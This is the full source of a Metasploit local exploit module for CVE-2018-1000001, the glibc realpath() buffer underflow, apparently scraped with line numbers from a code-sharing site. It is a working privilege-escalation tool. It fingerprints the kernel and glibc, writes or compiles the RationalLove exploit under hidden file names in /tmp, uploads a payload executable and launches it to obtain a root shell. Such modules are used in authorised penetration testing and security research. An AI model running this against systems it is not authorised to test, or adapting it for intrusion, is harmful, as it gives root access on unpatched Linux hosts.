Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Exploit::Local
7
  Rank = NormalRanking
8

9
  include Msf::Post::File
10
  include Msf::Post::Linux::Priv
11
  include Msf::Post::Linux::System
12
  include Msf::Post::Linux::Kernel
13
  include Msf::Exploit::EXE
14
  include Msf::Exploit::FileDropper
15
  prepend Msf::Exploit::Remote::AutoCheck
16

17
  def initialize(info = {})
18
    super(
19
      update_info(
20
        info,
21
        'Name' => "glibc 'realpath()' Privilege Escalation",
22
        'Description' => %q{
23
          This module attempts to gain root privileges on Linux systems by abusing
24
          a vulnerability in GNU C Library (glibc) version 2.26 and prior.
25

26
          This module uses halfdog's RationalLove exploit to exploit a buffer
27
          underflow in glibc realpath() and create a SUID root shell. The exploit
28
          has offsets for glibc versions 2.23-0ubuntu9 and 2.24-11+deb9u1.
29

30
          The target system must have unprivileged user namespaces enabled.
31

32
          This module has been tested successfully on Ubuntu Linux 16.04.3 (x86_64)
33
          with glibc version 2.23-0ubuntu9; and Debian 9.0 (x86_64) with glibc
34
          version 2.24-11+deb9u1.
35
        },
36
        'License' => MSF_LICENSE,
37
        'Author' => [
38
          'halfdog', # Discovery and RationalLove.c exploit
39
          'bcoles' # Metasploit
40
        ],
41
        'DisclosureDate' => '2018-01-16',
42
        'Platform' => [ 'linux' ],
43
        'Arch' => [ ARCH_X86, ARCH_X64 ],
44
        'SessionTypes' => [ 'shell', 'meterpreter' ],
45
        'Targets' => [[ 'Auto', {} ]],
46
        'Privileged' => true,
47
        'References' => [
48
          [ 'BID', '102525' ],
49
          [ 'CVE', '2018-1000001' ],
50
          [ 'EDB', '43775' ],
51
          [ 'URL', 'https://www.halfdog.net/Security/2017/LibcRealpathBufferUnderflow/' ],
52
          [ 'URL', 'http://www.openwall.com/lists/oss-security/2018/01/11/5' ],
53
          [ 'URL', 'https://securitytracker.com/id/1040162' ],
54
          [ 'URL', 'https://sourceware.org/bugzilla/show_bug.cgi?id=22679' ],
55
          [ 'URL', 'https://usn.ubuntu.com/3534-1/' ],
56
          [ 'URL', 'https://bugzilla.redhat.com/show_bug.cgi?id=1533836' ]
57
        ],
58
        'DefaultTarget' => 0,
59
        'Notes' => {
60
          'AKA' => ['RationalLove.c']
61
        },
62
        'Compat' => {
63
          'Meterpreter' => {
64
            'Commands' => %w[
65
              stdapi_fs_delete_file
66
            ]
67
          }
68
        }
69
      )
70
    )
71
    register_options [
72
      OptEnum.new('COMPILE', [ true, 'Compile on target', 'Auto', %w(Auto True False) ])
73
    ]
74
    register_advanced_options [
75
      OptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ])
76
    ]
77
  end
78

79
  def base_dir
80
    datastore['WritableDir'].to_s
81
  end
82

83
  def upload(path, data)
84
    print_status "Writing '#{path}' (#{data.size} bytes) ..."
85
    write_file path, data
86
    register_file_for_cleanup path
87
  end
88

89
  def upload_and_chmodx(path, data)
90
    upload path, data
91
    cmd_exec "chmod +x '#{path}'"
92
  end
93

94
  def upload_and_compile(path, data)
95
    upload "#{path}.c", data
96

97
    gcc_cmd = "gcc -w -o #{path} #{path}.c"
98
    if session.type.eql? 'shell'
99
      gcc_cmd = "PATH=$PATH:/usr/bin/ #{gcc_cmd}"
100
    end
101
    output = cmd_exec gcc_cmd
102

103
    unless output.blank?
104
      print_error output
105
      fail_with Failure::Unknown, "#{path}.c failed to compile"
106
    end
107

108
    register_file_for_cleanup path
109
    cmd_exec "chmod +x #{path}"
110
  end
111

112
  def strip_comments(c_code)
113
    c_code.gsub(%r{/\*.*?\*/}m, '').gsub(%r{^\s*//.*$}, '')
114
  end
115

116
  def exploit_data(file)
117
    ::File.binread ::File.join(Msf::Config.data_directory, 'exploits', 'cve-2018-1000001', file)
118
  end
119

120
  def live_compile?
121
    return false unless datastore['COMPILE'].eql?('Auto') || datastore['COMPILE'].eql?('True')
122

123
    if has_gcc?
124
      vprint_good 'gcc is installed'
125
      return true
126
    end
127

128
    unless datastore['COMPILE'].eql? 'Auto'
129
      fail_with Failure::BadConfig, 'gcc is not installed. Compiling will fail.'
130
    end
131
  end
132

133
  def check
134
    version = kernel_release
135
    if Rex::Version.new(version.split('-').first) < Rex::Version.new('2.6.36')
136
      vprint_error "Linux kernel version #{version} is not vulnerable"
137
      return CheckCode::Safe
138
    end
139
    vprint_good "Linux kernel version #{version} is vulnerable"
140

141
    arch = kernel_hardware
142
    unless arch.include? 'x86_64'
143
      vprint_error "System architecture #{arch} is not supported"
144
      return CheckCode::Safe
145
    end
146
    vprint_good "System architecture #{arch} is supported"
147

148
    version = glibc_version
149
    if Rex::Version.new(version.split('-').first) > Rex::Version.new('2.26')
150
      vprint_error "GNU C Library version #{version} is not vulnerable"
151
      return CheckCode::Safe
152
    end
153
    vprint_good "GNU C Library version #{version} is vulnerable"
154

155
    # fuzzy match glibc 2.23-0ubuntu9 and 2.24-11+deb9u1
156
    glibc_banner = cmd_exec('ldd --version')
157
    unless glibc_banner.include?('2.23-0ubuntu') || glibc_banner.include?('2.24-11+deb9')
158
      vprint_error 'No offsets for this version of GNU C Library'
159
      return CheckCode::Safe
160
    end
161

162
    config = kernel_config
163
    if config.nil?
164
      vprint_error 'Could not retrieve kernel config'
165
      return CheckCode::Unknown
166
    end
167

168
    unless config.include? 'CONFIG_USER_NS=y'
169
      vprint_error 'Kernel config does not include CONFIG_USER_NS'
170
      return CheckCode::Safe
171
    end
172
    vprint_good 'Kernel config has CONFIG_USER_NS enabled'
173

174
    unless userns_enabled?
175
      vprint_error 'Unprivileged user namespaces are not permitted'
176
      return CheckCode::Safe
177
    end
178
    vprint_good 'Unprivileged user namespaces are permitted'
179

180
    CheckCode::Appears
181
  end
182

183
  def exploit
184
    if !datastore['ForceExploit'] && is_root?
185
      fail_with(Failure::BadConfig, 'Session already has root privileges. Set ForceExploit to override.')
186
    end
187

188
    unless writable? base_dir
189
      fail_with Failure::BadConfig, "#{base_dir} is not writable"
190
    end
191

192
    unless writable? base_dir
193
      fail_with Failure::BadConfig, "#{base_dir} is not writable"
194
    end
195

196
    # Upload exploit executable
197
    executable_name = ".#{rand_text_alphanumeric rand(5..10)}"
198
    @executable_path = "#{base_dir}/#{executable_name}"
199
    if live_compile?
200
      vprint_status 'Live compiling exploit on system...'
201
      upload_and_compile @executable_path, strip_comments(exploit_data('RationalLove.c'))
202
    else
203
      vprint_status 'Dropping pre-compiled exploit on system...'
204
      upload_and_chmodx @executable_path, exploit_data('RationalLove')
205
    end
206

207
    # Upload payload executable
208
    payload_path = "#{base_dir}/.#{rand_text_alphanumeric rand(5..10)}"
209
    upload_and_chmodx payload_path, generate_payload_exe
210

211
    # Launch exploit
212
    print_status 'Launching exploit...'
213
    output = cmd_exec "echo '#{payload_path} & exit' | #{@executable_path}", nil, 30
214
    output.each_line { |line| vprint_status line.chomp }
215
  end
216

217
  def on_new_session(client)
218
    # remove root owned SUID executable
219
    if client.type.eql? 'meterpreter'
220
      client.core.use 'stdapi' unless client.ext.aliases.include? 'stdapi'
221
      client.fs.file.rm @executable_path
222
    else
223
      client.shell_command_token "rm #{@executable_path}"
224
    end
225
  end
226
end
227

228